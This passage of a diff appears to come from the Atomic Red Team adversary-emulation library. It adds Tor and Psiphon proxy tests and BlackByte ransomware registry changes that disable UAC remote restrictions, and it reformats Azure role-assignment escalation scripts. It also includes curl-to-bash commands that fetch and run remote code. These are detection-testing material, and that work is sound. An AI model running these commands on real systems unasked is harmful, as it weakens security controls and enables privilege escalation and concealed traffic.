+    Upon successful execution, the tor proxy will be launched, run for 60 seconds, and then exit. 
+  supported_platforms:
+  - windows
+  input_arguments:
+    TorExe:
+      description: Location of tor.exe file.  
+      type: String
+      default: $env:temp\tor\Tor\tor.exe
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      tor.exe must be installed on the machine 
+    prereq_command: |
+      if (Test-Path #{TorExe}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Start-BitsTransfer -Source "https://archive.torproject.org/tor-package-archive/torbrowser/11.0.6/tor-win32-0.4.6.9.zip" -Destination "$env:temp\tor.zip" -dynamic
+      expand-archive -LiteralPath "$env:temp\tor.zip" -DestinationPath "$env:temp\tor"
+  executor:
+    command: |
+     invoke-expression 'cmd /c start powershell -Command {cmd /c #{TorExe}}'
+     sleep -s 60
+     stop-process -name "tor" | out-null
+    name: powershell
+    elevation_required: false
+- name: Tor Proxy Usage - Debian/Ubuntu
+  auto_generated_guid: 5ff9d047-6e9c-4357-b39b-5cf89d9b59c7
+  description: |
+    This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality.
+    Upon successful execution, the tor proxy service will be launched. 
+  supported_platforms:
+  - linux
+  dependency_executor_name: sh
+  dependencies:
+  - description: |
+     Tor must be installed on the machine 
+    prereq_command: |
+     if [ -x "$(command -v tor --version)" ]; then exit 0; else exit 1; fi
+    get_prereq_command: |
+     sudo apt-get -y install tor
+  executor:
+    command: |
+     sudo systemctl start tor 
+    cleanup_command: |
+     sudo systemctl stop tor
+    name: sh
+- name: Tor Proxy Usage - MacOS
+  auto_generated_guid: 12631354-fdbc-4164-92be-402527e748da
+  description: |
+    This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality.
+    Upon successful execution, the tor proxy service will be launched. 
+  supported_platforms:
+  - macos
+  dependency_executor_name: sh
+  dependencies:
+  - description: |
+     Tor must be installed on the machine 
+    prereq_command: |
+     if [ -x "$(command -v tor --version)" ]; then exit 0; else exit 1; fi
+    get_prereq_command: |
+      if [ ! -x "$(command -v brew --version)" ]; then /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh keystroke return)"; fi
+      brew install tor
+  executor:
+    command: |
+     osascript -e 'tell application "Terminal" to do script "tor"'
+    cleanup_command: |
+     killall tor > /dev/null 2>&1
+    name: sh        

atomics/T1090.003/src/Psiphon.bat

@@ -0,0 +1,6 @@
+@echo off
+start %USERPROFILE%\Downloads\psiphon3.exe
+timeout /t 20 >nul 2>&1
+Taskkill /IM msedge.exe /F >nul 2>&1
+Taskkill /IM psiphon3.exe /F >nul 2>&1
+Taskkill /IM psiphon-tunnel-core.exe /F >nul 2>&1

atomics/T1098/T1098.md

@@ -206,6 +206,7 @@ echo Please run atomic test T1136.003, before running this atomic test
 
 
 
+<br/>
 <br/>
 
 ## Atomic Test #4 - Azure - adding user to Azure AD role
@@ -213,7 +214,7 @@ The adversarie want to add user to some Azure AD role. Threat actor
 may be interested primarily in highly privileged roles, e.g. Global Administrator, Application Administrator, 
 Privileged authentication administrator (this role can reset Global Administrator password!).
 By default, the role Global Reader is assigned to service principal in this test.
-  
+
 The account you use to run the PowerShell command should have Privileged Role Administrator or Global Administrator role in your Azure AD.
 
 Detection hint - check Activity "Add member to role" in Azure AD Audit Logs. In targer you will also see User as a type.
@@ -221,46 +222,52 @@ Detection hint - check Activity "Add member to role" in Azure AD Audit Logs. In
 **Supported Platforms:** Azure-ad
 
 
+**auto_generated_guid:** 0e65ae27-5385-46b4-98ac-607a8ee82261
+
+
+
+
+
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | username | Azure AD username | String | jonh@contoso.com|
 | password | Azure AD password | String | p4sswd|
 | user_principal_name | Name of the targeted user (user principal) | String | SuperUser|
-| role_name | Name of the targeted role | String | Global Reader|
-
+| role_name | Name of the targed Azure AD role | String | Global Reader|
 
 
 #### Attack Commands: Run with `powershell`! 
 
+
 ```powershell
 Import-Module -Name AzureAD
-      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
-      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
-      Connect-AzureAD -Credential $Credential
+$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+Connect-AzureAD -Credential $Credential
 
-      $user = Get-AzureADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
-      if ($user -eq $null) { Write-Warning "User not found"; exit }
-      $role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"}
-      if ($role -eq $null) { Write-Warning "Role not found"; exit }
-      Add-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $user.ObjectId
-      Write-Host "User $($user.DisplayName) was added to $($role.DisplayName) role"
+$user = Get-AzureADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+if ($user -eq $null) { Write-Warning "User not found"; exit }
+$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"}
+if ($role -eq $null) { Write-Warning "Role not found"; exit }
+Add-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $user.ObjectId
+Write-Host "User $($user.DisplayName) was added to $($role.DisplayName) role"
 ```
 
 #### Cleanup Commands:
 ```powershell
 Import-Module -Name AzureAD -ErrorAction Ignore
-      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
-      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
-      Connect-AzureAD -Credential $Credential -ErrorAction Ignore
+$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+Connect-AzureAD -Credential $Credential -ErrorAction Ignore
 
-      $user = Get-AzureADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
-      if ($user -eq $null) { Write-Warning "User not found"; exit }
-      $role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"}
-      if ($role -eq $null) { Write-Warning "Role not found"; exit }
-      
-      Remove-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -MemberId $user.ObjectId
-      Write-Host "User $($user.DisplayName) was removed from $($role.DisplayName) role"
+$user = Get-AzureADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+if ($user -eq $null) { Write-Warning "User not found"; exit }
+$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"}
+if ($role -eq $null) { Write-Warning "Role not found"; exit }
+
+Remove-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -MemberId $user.ObjectId
+Write-Host "User $($user.DisplayName) was removed from $($role.DisplayName) role"
 ```
 
 
@@ -276,59 +283,71 @@ try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit
 Install-Module -Name AzureAD -Force
 ```
 
+
+
+
 <br/>
 <br/>
 
 ## Atomic Test #5 - Azure - adding service principal to Azure AD role
-The adversarie want to add service principal to some Azure AD role. Threat actor may be interested primarily in highly privileged roles, e.g. Global Administrator, Application Administrator, Privileged authentication administrator (this role can reset Global Administrator password!).
+The adversarie want to add service principal to some Azure AD role. Threat actor 
+may be interested primarily in highly privileged roles, e.g. Global Administrator, Application Administrator, 
+Privileged authentication administrator (this role can reset Global Administrator password!).
 By default, the role Global Reader is assigned to service principal in this test.
-  
+
 The account you use to run the PowerShell command should have Privileged Role Administrator or Global Administrator role in your Azure AD.
 
 Detection hint - check Activity "Add member to role" in Azure AD Audit Logs. In targer you will also see Service Principal as a type.
+
 **Supported Platforms:** Azure-ad
 
 
+**auto_generated_guid:** 92c40b3f-c406-4d1f-8d2b-c039bf5009e4
+
+
+
+
+
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | username | Azure AD username | String | jonh@contoso.com|
 | password | Azure AD password | String | p4sswd|
-| service_principal_name | Name of the targeted service principal | String | SuperSP|
-| role_name | Name of the targeted role | String | Global Reader|
-
+| service_principal_name | Name of the service principal | String | SuperSP|
+| role_name | Name of the targed Azure AD role | String | Global Reader|
 
 
 #### Attack Commands: Run with `powershell`! 
 
+
 ```powershell
 Import-Module -Name AzureAD
-      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
-      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
-      Connect-AzureAD -Credential $Credential
+$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+Connect-AzureAD -Credential $Credential
 
-      $sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq "#{service_principal_name}"}
-      if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
-      $role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"}
-      if ($role -eq $null) { Write-Warning "Role not found"; exit }
-      Add-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.ObjectId
-      Write-Host "Service Principal $($sp.DisplayName) was added to $($role.DisplayName)"
+$sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq "#{service_principal_name}"}
+if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
+$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"}
+if ($role -eq $null) { Write-Warning "Role not found"; exit }
+Add-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.ObjectId
+Write-Host "Service Principal $($sp.DisplayName) was added to $($role.DisplayName)"
 ```
 
 #### Cleanup Commands:
 ```powershell
 Import-Module -Name AzureAD -ErrorAction Ignore
-      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
-      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
-      Connect-AzureAD -Credential $Credential -ErrorAction Ignore
+$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+Connect-AzureAD -Credential $Credential -ErrorAction Ignore
 
-      $sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq "#{service_principal_name}"}
-      if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
-      $role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"}
-      if ($role -eq $null) { Write-Warning "Role not found"; exit }
+$sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq "#{service_principal_name}"}
+if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
+$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"}
+if ($role -eq $null) { Write-Warning "Role not found"; exit }
 
-      Remove-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -MemberId $sp.ObjectId
-      Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.DisplayName) role"
+Remove-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -MemberId $sp.ObjectId
+Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.DisplayName) role"
 ```
 
 
@@ -344,23 +363,32 @@ try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit
 Install-Module -Name AzureAD -Force
 ```
 
+
+
+
 <br/>
 <br/>
 
 ## Atomic Test #6 - Azure - adding user to Azure role in subscription
-The adversarie want to add user to some Azure role, also called Azure resource role. Threat actor may be 
-interested primarily in highly privileged roles, e.g. Owner, Contributor.
+The adversarie want to add user to some Azure role, also called Azure resource role. Threat actor 
+may be interested primarily in highly privileged roles, e.g. Owner, Contributor.
 By default, the role Reader is assigned to user in this test.
 
 New-AzRoleAssignment cmdlet could be also use to assign user/service principal to resource, resource group and management group.
-  
+
 The account you use to run the PowerShell command must have Microsoft.Authorization/roleAssignments/write 
 (e.g. such as User Access Administrator or Owner) and the Azure Active Directory Graph Directory.Read.All 
 and Microsoft Graph Directory.Read.All permissions.
 
 Detection hint - check Operation Name "Create role assignment" in subscriptions Activity Logs.
 
-**Supported Platforms:** iaas:azure
+**Supported Platforms:** Iaas:azure
+
+
+**auto_generated_guid:** 1a94b3fc-b080-450a-b3d8-6d9b57b472ea
+
+
+
 
 
 #### Inputs:
@@ -369,46 +397,46 @@ Detection hint - check Operation Name "Create role assignment" in subscriptions
 | username | Azure AD username | String | jonh@contoso.com|
 | password | Azure AD password | String | p4sswd|
 | user_principal_name | Name of the targeted user (user principal) | String | SuperUser|
-| role_name | Name of the targeted role | String | Reader|
+| role_name | Name of the targed Azure role | String | Reader|
 | subscription | Name of the targed subscription | String | Azure subscription 1|
 
 
-
 #### Attack Commands: Run with `powershell`! 
 
+
 ```powershell
 Import-Module -Name Az.Resources
-      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
-      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
-      Connect-AzAccount -Credential $Credential
+$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+Connect-AzAccount -Credential $Credential
 
-      $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
-      if ($user -eq $null) { Write-Warning "User not found"; exit }
-      $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
-      if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
-      $role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"}
-      if ($role -eq $null) { Write-Warning "Role not found"; exit }
+$user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+if ($user -eq $null) { Write-Warning "User not found"; exit }
+$subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
+if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
+$role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"}
+if ($role -eq $null) { Write-Warning "Role not found"; exit }
 
-      New-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription
-      Write-Host "User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)"
+New-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription
+Write-Host "User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)"
 ```
 
 #### Cleanup Commands:
 ```powershell
 Import-Module -Name AzureAD -ErrorAction Ignore
-      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
-      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
-      Connect-AzAccount -Credential $Credential -ErrorAction Ignore
+$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+Connect-AzAccount -Credential $Credential -ErrorAction Ignore
 
-      $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
-      if ($user -eq $null) { Write-Warning "User not found"; exit }
-      $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
-      if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
-      $role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"}
-      if ($role -eq $null) { Write-Warning "Role not found"; exit }
+$user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+if ($user -eq $null) { Write-Warning "User not found"; exit }
+$subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
+if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
+$role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"}
+if ($role -eq $null) { Write-Warning "Role not found"; exit }
 
-      Remove-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription
-      Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.Name) role in subscriptions $($subscriptionsName)"
+Remove-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription
+Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.Name) role in subscriptions $($subscriptions.Name)"
 ```
 
 
@@ -424,23 +452,32 @@ try {if (Get-InstalledModule -Name Az.Resources -ErrorAction SilentlyContinue) {
 Install-Module -Name Az.Resources -Force
 ```
 
+
+
+
 <br/>
 <br/>
 
 ## Atomic Test #7 - Azure - adding service principal to Azure role in subscription
-The adversarie want to add service principal to some Azure role, also called Azure resource role. Threat actor may be 
-interested primarily in highly privileged roles, e.g. Owner, Contributor.
+The adversarie want to add service principal to some Azure role, also called Azure resource role. Threat actor 
+may be interested primarily in highly privileged roles, e.g. Owner, Contributor.
 By default, the role Reader is assigned to service principal in this test.
 
 New-AzRoleAssignment cmdlet could be also use to assign user/service principal to resource, resource group and management group.
-  
+
 The account you use to run the PowerShell command must have Microsoft.Authorization/roleAssignments/write 
 (e.g. such as User Access Administrator or Owner) and the Azure Active Directory Graph Directory.Read.All 
 and Microsoft Graph Directory.Read.All permissions.
 
 Detection hint - check Operation Name "Create role assignment" in subscriptions Activity Logs.
 
-**Supported Platforms:** iaas:azure
+**Supported Platforms:** Iaas:azure
+
+
+**auto_generated_guid:** c8f4bc29-a151-48da-b3be-4680af56f404
+
+
+
 
 
 #### Inputs:
@@ -448,47 +485,47 @@ Detection hint - check Operation Name "Create role assignment" in subscriptions
 |------|-------------|------|---------------|
 | username | Azure AD username | String | jonh@contoso.com|
 | password | Azure AD password | String | p4sswd|
-| service_principal_name | Name of the targeted service principal | String | SuperSP|
-| role_name | Name of the targeted role | String | Reader|
+| service_principal_name | Name of the service principal | String | SuperSP|
+| role_name | Name of the targed Azure role | String | Reader|
 | subscription | Name of the targed subscription | String | Azure subscription 1|
 
 
-
 #### Attack Commands: Run with `powershell`! 
 
+
 ```powershell
 Import-Module -Name Az.Resources
-      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
-      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
-      Connect-AzAccount -Credential $Credential
+$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+Connect-AzAccount -Credential $Credential
 
-      $sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq "#{service_principal_name}"}
-      if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
-      $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"} 
-      if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
-      $role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"}
-      if ($role -eq $null) { Write-Warning "Role not found"; exit }
+$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq "#{service_principal_name}"}
+if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
+$subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"} 
+if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
+$role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"}
+if ($role -eq $null) { Write-Warning "Role not found"; exit }
 
-      New-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription
-      Write-Host "Service Principal $($sp.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)"
+New-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription
+Write-Host "Service Principal $($sp.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)"
 ```
 
 #### Cleanup Commands:
 ```powershell
 Import-Module -Name AzureAD -ErrorAction Ignore
-      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
-      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
-      Connect-AzAccount -Credential $Credential -ErrorAction Ignore
+$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+Connect-AzAccount -Credential $Credential -ErrorAction Ignore
 
-      $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
-      if ($user -eq $null) { Write-Warning "User not found"; exit }
-      $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
-      if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
-      $role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"}
-      if ($role -eq $null) { Write-Warning "Role not found"; exit }
+$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq "#{service_principal_name}"}
+if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
+$subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"} 
+if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
+$role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"}
+if ($role -eq $null) { Write-Warning "Role not found"; exit }
 
-      Remove-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription
-      Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.Name) role in subscriptions $($subscriptionsName)"
+Remove-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription
+Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.Name) role in subscriptions $($subscriptions.Name)"
 ```
 
 
@@ -504,7 +541,9 @@ try {if (Get-InstalledModule -Name Az.Resources -ErrorAction SilentlyContinue) {
 Install-Module -Name Az.Resources -Force
 ```
 
-<br/>
+
+
+
 <br/>
 
 ## Atomic Test #8 - Azure - adding permission to application

atomics/T1098/T1098.yaml

@@ -129,6 +129,7 @@ atomic_tests:
     name: sh
 
 - name: Azure - adding user to Azure AD role
+  auto_generated_guid: 0e65ae27-5385-46b4-98ac-607a8ee82261
   description: |
     The adversarie want to add user to some Azure AD role. Threat actor 
     may be interested primarily in highly privileged roles, e.g. Global Administrator, Application Administrator, 
@@ -194,6 +195,7 @@ atomic_tests:
     elevation_required: false
 
 - name: Azure - adding service principal to Azure AD role
+  auto_generated_guid: 92c40b3f-c406-4d1f-8d2b-c039bf5009e4
   description: |
     The adversarie want to add service principal to some Azure AD role. Threat actor 
     may be interested primarily in highly privileged roles, e.g. Global Administrator, Application Administrator, 
@@ -259,6 +261,7 @@ atomic_tests:
     elevation_required: false
 
 - name: Azure - adding user to Azure role in subscription
+  auto_generated_guid: 1a94b3fc-b080-450a-b3d8-6d9b57b472ea
   description: |
     The adversarie want to add user to some Azure role, also called Azure resource role. Threat actor 
     may be interested primarily in highly privileged roles, e.g. Owner, Contributor.
@@ -336,6 +339,7 @@ atomic_tests:
     elevation_required: false
 
 - name: Azure - adding service principal to Azure role in subscription
+  auto_generated_guid: c8f4bc29-a151-48da-b3be-4680af56f404
   description: |
     The adversarie want to add service principal to some Azure role, also called Azure resource role. Threat actor 
     may be interested primarily in highly privileged roles, e.g. Owner, Contributor.

atomics/T1110.004/T1110.004.md

@@ -113,7 +113,7 @@ if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
 ```
 ##### Get Prereq Commands:
 ```bash
-/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"
+/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/e8114640740938c20cc41ffdbf07816b428afc49/install.sh)"
 brew install hudochenkov/sshpass/sshpass
 ```
 

atomics/T1110.004/T1110.004.yaml

@@ -54,7 +54,7 @@ atomic_tests:
       prereq_command: |
         if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
       get_prereq_command: |
-        /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"
+        /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/e8114640740938c20cc41ffdbf07816b428afc49/install.sh)"
         brew install hudochenkov/sshpass/sshpass
 
   executor:

atomics/T1112/T1112.md

@@ -22,6 +22,10 @@ The Registry of a remote system may be modified to aid in execution of files as
 
 - [Atomic Test #6 - Change Powershell Execution Policy to Bypass](#atomic-test-6---change-powershell-execution-policy-to-bypass)
 
+- [Atomic Test #7 - BlackByte Ransomware Registry Changes - CMD](#atomic-test-7---blackbyte-ransomware-registry-changes---cmd)
+
+- [Atomic Test #8 - BlackByte Ransomware Registry Changes - Powershell](#atomic-test-8---blackbyte-ransomware-registry-changes---powershell)
+
 
 <br/>
 
@@ -246,4 +250,90 @@ try { Set-ExecutionPolicy -ExecutionPolicy #{default_execution_policy} -Scope Lo
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #7 - BlackByte Ransomware Registry Changes - CMD
+This task recreates the steps taken by BlackByte ransomware before it worms to other machines.  See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/
+The steps are as follows:
+<ol>
+    <li>1. Elevate Local Privilege by disabling UAC Remote Restrictions</li>
+    <li>2. Enable OS to share network connections between different privilege levels</li>
+    <li>3. Enable long path values for file paths, names, and namespaces to ensure encryption of all file names and paths</li>
+</ol>
+The registry keys and their respective values will be created upon successful execution.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 4f4e2f9f-6209-4fcf-9b15-3b7455706f5b
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
+cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
+cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v LocalAccountTokenFilterPolicy /f 2>&1
+reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLinkedConnections /f 2>&1
+reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #8 - BlackByte Ransomware Registry Changes - Powershell
+This task recreates the steps taken by BlackByte ransomware before it worms to other machines via Powershell.  See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/
+The steps are as follows:
+<ol>
+    <li>1. Elevate Local Privilege by disabling UAC Remote Restrictions</li>
+    <li>2. Enable OS to share network connections between different privilege levels</li>
+    <li>3. Enable long path values for file paths, names, and namespaces to ensure encryption of all file names and paths</li>
+</ol>
+The registry keys and their respective values will be created upon successful execution.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 0b79c06f-c788-44a2-8630-d69051f1123d
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -PropertyType DWord -Value 1 -Force
+New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -PropertyType DWord -Value 1 -Force
+New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -PropertyType DWord -Value 1 -Force
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Force
+Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -Force
+Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force
+```
+
+
+
+
+
 <br/>

atomics/T1112/T1112.yaml

@@ -108,3 +108,51 @@ atomic_tests:
     cleanup_command: |
       try { Set-ExecutionPolicy -ExecutionPolicy #{default_execution_policy} -Scope LocalMachine -Force } catch {}
     name: powershell
+- name: BlackByte Ransomware Registry Changes - CMD
+  auto_generated_guid: 4f4e2f9f-6209-4fcf-9b15-3b7455706f5b
+  description: |
+    This task recreates the steps taken by BlackByte ransomware before it worms to other machines.  See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/
+    The steps are as follows:
+    <ol>
+        <li>1. Elevate Local Privilege by disabling UAC Remote Restrictions</li>
+        <li>2. Enable OS to share network connections between different privilege levels</li>
+        <li>3. Enable long path values for file paths, names, and namespaces to ensure encryption of all file names and paths</li>
+    </ol>
+    The registry keys and their respective values will be created upon successful execution.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
+      cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
+      cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f
+    cleanup_command: |
